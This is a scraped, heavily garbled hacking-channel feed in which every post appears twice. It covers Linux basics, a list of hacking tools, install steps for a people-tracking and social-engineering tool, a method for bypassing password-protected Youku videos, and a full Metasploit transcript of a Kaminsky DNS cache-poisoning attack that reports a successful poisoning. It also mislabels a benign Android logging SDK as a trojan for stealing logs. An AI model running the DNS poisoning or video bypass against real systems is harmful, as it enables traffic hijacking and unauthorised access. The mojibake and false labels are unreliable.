Forwarded from UNDERCODE NEWS
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBasic Linux commands:
pwd. List the current (working) directory. [user @ testhost ~] $ pwd / home / user.
date. Display the current date and time of the system.
w. This command shows who is logged in to the system.
ls. Print directory contents.
cd. Change the current directory.
mkdir. Create directory.
rm. Delete a file.
cp. Copy file or directory.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBasic Linux commands:
pwd. List the current (working) directory. [user @ testhost ~] $ pwd / home / user.
date. Display the current date and time of the system.
w. This command shows who is logged in to the system.
ls. Print directory contents.
cd. Change the current directory.
mkdir. Create directory.
rm. Delete a file.
cp. Copy file or directory.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ100% working way to remove protection from Excel document with and without password :
https://www.linkconnector.com/ta.php?lc=155151095842006248&lcpt=1&lcpf=0
https://www.linkconnector.com/ta.php?lc=155151095842006248&lcpt=1&lcpf=0
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Night Shift on Unsupported Macs ?
MacBookPro9,x
iMacPro1,x
iMac13,x
Macmini6,x
MacBookAir5,x
MacPro6,x
MacBook8,x
๐ป๐ด๐ '๐ ๐ ๐ ๐ฐ๐ ๐ :
1) Open the Installer in the Root of the Repository
https://github.com/TMRJIJ/Night-Shift-on-Unsupported-Macs
2) Follow the steps and agree to the terms
3) Accept & Install
4) Upon Completion, Restart your Mac
5) You will see that the Night Shift tab is now available in System Preferences > Display as well as the toggle at the top of your Notification Center.
6) Open the Terminal app in your Applications Folder
7) Drag the 'Enable NightShift.sh' into the Terminal Window
Following the instructions
8) After Patching. Restart your Mac.
9) You will see that the Night Shift tab is now available in System Preferences > Display as well as the toggle at the top of your Notification Center.
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Night Shift on Unsupported Macs ?
MacBookPro9,x
iMacPro1,x
iMac13,x
Macmini6,x
MacBookAir5,x
MacPro6,x
MacBook8,x
๐ป๐ด๐ '๐ ๐ ๐ ๐ฐ๐ ๐ :
1) Open the Installer in the Root of the Repository
https://github.com/TMRJIJ/Night-Shift-on-Unsupported-Macs
2) Follow the steps and agree to the terms
3) Accept & Install
4) Upon Completion, Restart your Mac
5) You will see that the Night Shift tab is now available in System Preferences > Display as well as the toggle at the top of your Notification Center.
6) Open the Terminal app in your Applications Folder
7) Drag the 'Enable NightShift.sh' into the Terminal Window
Following the instructions
8) After Patching. Restart your Mac.
9) You will see that the Night Shift tab is now available in System Preferences > Display as well as the toggle at the top of your Notification Center.
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - TMRJIJ/Night-Shift-on-Unsupported-Macs: Enable Night Shift on older Unsupported Macs
Enable Night Shift on older Unsupported Macs. Contribute to TMRJIJ/Night-Shift-on-Unsupported-Macs development by creating an account on GitHub.
๐ฆbest wireless debugging for android devices :
https://dl.google.com/android/repository/platform-tools-latest-windows.zip (debug via windows)
https://dl.google.com/android/repository/platform-tools-latest-windows.zip (debug via windows)
Forwarded from UNDERCODE NEWS
Appleโs official website enters maintenance status: iPhone 12mini opens pre-order tonight.
#international
#international
Forwarded from UNDERCODE NEWS
Through NVIDIA Cloud Games, iOS users will be able to replay โFortress Nightโ
#international #Updates
#international #Updates
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆSOME HACKER TOOLS:
- CrawlBox - Easy way to brute-force web directory..
- TrackOut - Simple Python IP Tracker.
- sslcaudit - No description provided
- Sublist3r - Fast subdomains enumeration tool for penetration testers.
- doork - Passive Vulnerability Auditor.
- sir - Skype Ip Resolver.
- xl-py - No description provided
- netdiscover - netdiscover.
- ATSCAN - Advanced dork Search & Mass Exploit Scanner.![->]
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆSOME HACKER TOOLS:
- CrawlBox - Easy way to brute-force web directory..
- TrackOut - Simple Python IP Tracker.
- sslcaudit - No description provided
- Sublist3r - Fast subdomains enumeration tool for penetration testers.
- doork - Passive Vulnerability Auditor.
- sir - Skype Ip Resolver.
- xl-py - No description provided
- netdiscover - netdiscover.
- ATSCAN - Advanced dork Search & Mass Exploit Scanner.![->]
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - abaykan/CrawlBox: Easy way to brute-force web directory.
Easy way to brute-force web directory. Contribute to abaykan/CrawlBox development by creating an account on GitHub.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆA TROJAN FOR STEAL LOGS:
F E A T U R E S :
Concise API, it is easy to achieve diary record function through a few lines of code;
Use the AOP technologies Lancet SDK, it is comfortable to collect common logs, also support incremental compile;
Use mmap technology to ensure the efficiency of log records;
Scalability, developers can customize the log file to achieve the purpose of the upload;
Small traffic overhead, remote control user log file upload or not by online configuration;
High stability, it is very stable at many apps.
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
DOWNLOAD https://github.com/eleme/Trojan
Add in the root directory's build.gradle:
buildscript {
dependencies {
......
classpath 'me.ele:lancet-plugin:1.0.2'
}
}
Add in the app directory's build.gradle:
apply plugin: 'me.ele.lancet'
dependencies {
......
provided 'me.ele:lancet-base:1.0.2'
compile 'me.ele:trojan-library:0.0.5'
}
Use
1) Initialization
Add in the custom Application:
TrojanConfig config = new TrojanConfig.Builder(this)
// Set user information
.userInfo("xxxx")
// Set device id
.deviceId("xxxx")
// Set cipher key if need encry log
.cipherKey("xxxx")
// Optional, save log file in sdcard by default
.logDir("xxxx")
// Console log switch, the default is open
.enableLog(true)
.build();
Trojan.init(config);
๐ฆSpecial Note:
The log files are stored in sdcard by default and will not be lost even if the application is uninstalled;
To be compatible with multiple processes, log files stored in their respective directories;
The log is not encrypted by default, we currently only provide TEA encryption in view for high efficiencyใ
2) Record the log
Trojan provides two ways to recode log:
Firstly:
Trojan.log("Trojan", "We have a nice day!");
Secondly:
List<String> msgList = new LinkedList <>();
msgList.add("Hello Trojan!");
msgList.add("We have a nice day!");
msgList.add("Hello world!");
Trojan.log("Trojan", msgList);
By default, a single line log is not encrypted, and if you need to encrypt it, the following is used:
Trojan.log("Trojan", "We have a nice day!", true);
3) User Information
When the user information changes or switch users, you can call:
Trojan.refreshUser("new user info");
Of course, if the user logs out, you can pass a null value:
Trojan.refreshUser(null);
4) Upload Solution
In Demo we provided free and simple way such as LeanCloud to upload log file, you can browse, download and download log file.
5) Data Decryption
When we set the encryption key, we can encrypt a single log to ensure the security of sensitive data. We must decrypt the encrypted data When we analyze the log. Use the decryption script as follows:
Compile and generate decryption SO library on MAC, The so library has been generated in the repository. This step can be omitted:
gcc -shared -Wl,-install_name,trojan_decrypt.so -o trojan_decrypt.so -fPIC trojan_decrypt.c
Call python script to decrypt the data on MAC, you need to pass in the decryption key and file path to be decrypted, it should be noted that the path of the python script:
python ./trojan_decrypt.py cipher-key cipher-file-path
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆA TROJAN FOR STEAL LOGS:
F E A T U R E S :
Concise API, it is easy to achieve diary record function through a few lines of code;
Use the AOP technologies Lancet SDK, it is comfortable to collect common logs, also support incremental compile;
Use mmap technology to ensure the efficiency of log records;
Scalability, developers can customize the log file to achieve the purpose of the upload;
Small traffic overhead, remote control user log file upload or not by online configuration;
High stability, it is very stable at many apps.
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
DOWNLOAD https://github.com/eleme/Trojan
Add in the root directory's build.gradle:
buildscript {
dependencies {
......
classpath 'me.ele:lancet-plugin:1.0.2'
}
}
Add in the app directory's build.gradle:
apply plugin: 'me.ele.lancet'
dependencies {
......
provided 'me.ele:lancet-base:1.0.2'
compile 'me.ele:trojan-library:0.0.5'
}
Use
1) Initialization
Add in the custom Application:
TrojanConfig config = new TrojanConfig.Builder(this)
// Set user information
.userInfo("xxxx")
// Set device id
.deviceId("xxxx")
// Set cipher key if need encry log
.cipherKey("xxxx")
// Optional, save log file in sdcard by default
.logDir("xxxx")
// Console log switch, the default is open
.enableLog(true)
.build();
Trojan.init(config);
๐ฆSpecial Note:
The log files are stored in sdcard by default and will not be lost even if the application is uninstalled;
To be compatible with multiple processes, log files stored in their respective directories;
The log is not encrypted by default, we currently only provide TEA encryption in view for high efficiencyใ
2) Record the log
Trojan provides two ways to recode log:
Firstly:
Trojan.log("Trojan", "We have a nice day!");
Secondly:
List<String> msgList = new LinkedList <>();
msgList.add("Hello Trojan!");
msgList.add("We have a nice day!");
msgList.add("Hello world!");
Trojan.log("Trojan", msgList);
By default, a single line log is not encrypted, and if you need to encrypt it, the following is used:
Trojan.log("Trojan", "We have a nice day!", true);
3) User Information
When the user information changes or switch users, you can call:
Trojan.refreshUser("new user info");
Of course, if the user logs out, you can pass a null value:
Trojan.refreshUser(null);
4) Upload Solution
In Demo we provided free and simple way such as LeanCloud to upload log file, you can browse, download and download log file.
5) Data Decryption
When we set the encryption key, we can encrypt a single log to ensure the security of sensitive data. We must decrypt the encrypted data When we analyze the log. Use the decryption script as follows:
Compile and generate decryption SO library on MAC, The so library has been generated in the repository. This step can be omitted:
gcc -shared -Wl,-install_name,trojan_decrypt.so -o trojan_decrypt.so -fPIC trojan_decrypt.c
Call python script to decrypt the data on MAC, you need to pass in the decryption key and file path to be decrypted, it should be noted that the path of the python script:
python ./trojan_decrypt.py cipher-key cipher-file-path
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - eleme/Trojan: Trojan is an efficient mobile terminal lightweight log SDK
Trojan is an efficient mobile terminal lightweight log SDK - GitHub - eleme/Trojan: Trojan is an efficient mobile terminal lightweight log SDK
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆKaminsky DNS Cache Poisoning Flaw Exploit for Domains:
This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
records for the target domain.
Example
=======
# /msf3/msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######## ## #### ### ##### ##### ## #### #### #### ###
##
=[ msf v3.2-release
-- --=[ 298 exploits - 124 payloads
-- --=[ 18 encoders - 6 nops
=[ 73 aux
msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
b.iana-servers.net.
a.iana-servers.net.
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
dns01.metasploit.com.
Use for Learn !!
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆKaminsky DNS Cache Poisoning Flaw Exploit for Domains:
This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
records for the target domain.
Example
=======
# /msf3/msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######## ## #### ### ##### ##### ## #### #### #### ###
##
=[ msf v3.2-release
-- --=[ 298 exploits - 124 payloads
-- --=[ 18 encoders - 6 nops
=[ 73 aux
msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
b.iana-servers.net.
a.iana-servers.net.
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
dns01.metasploit.com.
Use for Learn !!
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆYouku video cracking method with password :
1) You can set independent playback passwords for videos on Youku website, but you know: You donโt need a password to watch Youku videos with a password. The following describes two methods for cracking Youku video password.
Youku video password cracking 1:
2) Open the FLV analysis website, which is recommended here: http://www.flvcd.com, copy the Youku video address to be decrypted from the browser address bar, and paste the video address into the address box of the FLV analysis website , Click "Start GO to analyze. Get the real download address of the video file, right-click the download address, and select "Save Target As" to download (you can also use download tools such as Thunder, Express, etc. to download, the speed is very fast).
3)Youku Video Password cracking method 2:
Just add "xia" (without double quotes) in front of the video address youku. For example, http://v.youku.comv_sohw/id_xntg1mzc4ndq=.html, just change it to http://v .xiayouku.com/v_show/id_xntg1mzc4ndq=.html, the real download address of the video file can be parsed by typing in the browser. The next operation is the same as step 3 of method 1.
Use for Learn !!
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆYouku video cracking method with password :
1) You can set independent playback passwords for videos on Youku website, but you know: You donโt need a password to watch Youku videos with a password. The following describes two methods for cracking Youku video password.
Youku video password cracking 1:
2) Open the FLV analysis website, which is recommended here: http://www.flvcd.com, copy the Youku video address to be decrypted from the browser address bar, and paste the video address into the address box of the FLV analysis website , Click "Start GO to analyze. Get the real download address of the video file, right-click the download address, and select "Save Target As" to download (you can also use download tools such as Thunder, Express, etc. to download, the speed is very fast).
3)Youku Video Password cracking method 2:
Just add "xia" (without double quotes) in front of the video address youku. For example, http://v.youku.comv_sohw/id_xntg1mzc4ndq=.html, just change it to http://v .xiayouku.com/v_show/id_xntg1mzc4ndq=.html, the real download address of the video file can be parsed by typing in the browser. The next operation is the same as step 3 of method 1.
Use for Learn !!
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE NEWS
UNDERCODE COMMUNITY
Photo
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆA GOOD WORKING TRACKING TOOL 2020 :
Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowlege, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
1) git clone https://github.com/jofpin/trape.git
2) cd trape
3) python2 trape.py -h
If it does not work, try to install all the libraries that are located in the file requirements.txt
4) python2 -m pip install -r requirements.txt
Example of execution
๐ฆExample: python2 trape.py --url http://example.com --port 8080
HELP AND OPTIONS
user:~$ python2 trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
[-ak ACCESSKEY] [-l LOCAL]
[--update] [-n] [-ic INJC]
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆA GOOD WORKING TRACKING TOOL 2020 :
Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowlege, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
1) git clone https://github.com/jofpin/trape.git
2) cd trape
3) python2 trape.py -h
If it does not work, try to install all the libraries that are located in the file requirements.txt
4) python2 -m pip install -r requirements.txt
Example of execution
๐ฆExample: python2 trape.py --url http://example.com --port 8080
HELP AND OPTIONS
user:~$ python2 trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
[-ak ACCESSKEY] [-l LOCAL]
[--update] [-n] [-ic INJC]
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - jofpin/trape: People tracker on the Internet: OSINT analysis and research tool by Jose Pino
People tracker on the Internet: OSINT analysis and research tool by Jose Pino - jofpin/trape
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMalConfScan: Volatility plugin to extract configuration data for known malware:
Ursnif
Emotet
Smoke loader
PoisonIvy
CobaltStrike
NetWire
PlugX
RedLeaves / Himawari / Lavender / Armadill / zark20rk
TSCookie
TSC_Loader
xxmm
Datper
Ramnit
HawkEye
Lokibot
Bebloh (Shiotob / URLZone)
AZORult
NanoCore RAT
AgentTesla
FormBook
NodeRAT ( https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html )
MalConfScan has a function for displaying a list of strings referenced by malicious code.
Configuration data is usually encoded by malware.
The malware writes decoded configuration data to memory, it may be in memory.
This function can list decoded configuration data.
๐ฆhttps://github.com/JPCERTCC/MalConfScan/wiki/how-to-install
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMalConfScan: Volatility plugin to extract configuration data for known malware:
Ursnif
Emotet
Smoke loader
PoisonIvy
CobaltStrike
NetWire
PlugX
RedLeaves / Himawari / Lavender / Armadill / zark20rk
TSCookie
TSC_Loader
xxmm
Datper
Ramnit
HawkEye
Lokibot
Bebloh (Shiotob / URLZone)
AZORult
NanoCore RAT
AgentTesla
FormBook
NodeRAT ( https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html )
MalConfScan has a function for displaying a list of strings referenced by malicious code.
Configuration data is usually encoded by malware.
The malware writes decoded configuration data to memory, it may be in memory.
This function can list decoded configuration data.
๐ฆhttps://github.com/JPCERTCC/MalConfScan/wiki/how-to-install
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
JPCERT/CC Eyes
ๆปๆใฐใซใผใTickใซใใๆฅๆฌใฎ็ต็นใใฟใผใฒใใใซใใๆปๆๆดปๅ - JPCERT/CC Eyes
ไปฅๅใฎJPCERT/CC EyesใงๆปๆใฐใซใผใTick[1] (BRONZE ...
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ๐ง How to install Apache mod_cloudflare on Debian ?
1) Cloudflare provides an official module for Apache server to capture real IP address.
2) Add GPG - Open Terminal and run the following commands to enable adding the gpg key to your system.
sudo apt install curl
curl -C - https://pkg.cloudflare.com/pubkey.gpg | sudo apt-key add -
Add PPA - then add cloudflare repository to your debian system
echo "deb http://pkg.cloudflare.com/
sudo tee /etc/apt/sources.list.d/cloudflare.list
3) Install the package - then update the Apt cache and install the libapache2-mod-cloudflare package on your Ubuntu system.
sudo apt update
sudo apt install libapache2-mod-cloudflare
4) Press "Y" to confirm the request during installation.
Restart Apache
5) After the installation is complete, restart the Apache2 service and check the active modules using the following commands.
sudo systemctl restart apache2
It's all.
6) The Apache server now logs the visitor's real IP address.
sudo apache2ctl -M
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ๐ง How to install Apache mod_cloudflare on Debian ?
1) Cloudflare provides an official module for Apache server to capture real IP address.
2) Add GPG - Open Terminal and run the following commands to enable adding the gpg key to your system.
sudo apt install curl
curl -C - https://pkg.cloudflare.com/pubkey.gpg | sudo apt-key add -
Add PPA - then add cloudflare repository to your debian system
echo "deb http://pkg.cloudflare.com/
lsb_release -cs main" | sudo tee /etc/apt/sources.list.d/cloudflare.list
3) Install the package - then update the Apt cache and install the libapache2-mod-cloudflare package on your Ubuntu system.
sudo apt update
sudo apt install libapache2-mod-cloudflare
4) Press "Y" to confirm the request during installation.
Restart Apache
5) After the installation is complete, restart the Apache2 service and check the active modules using the following commands.
sudo systemctl restart apache2
It's all.
6) The Apache server now logs the visitor's real IP address.
sudo apache2ctl -M
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ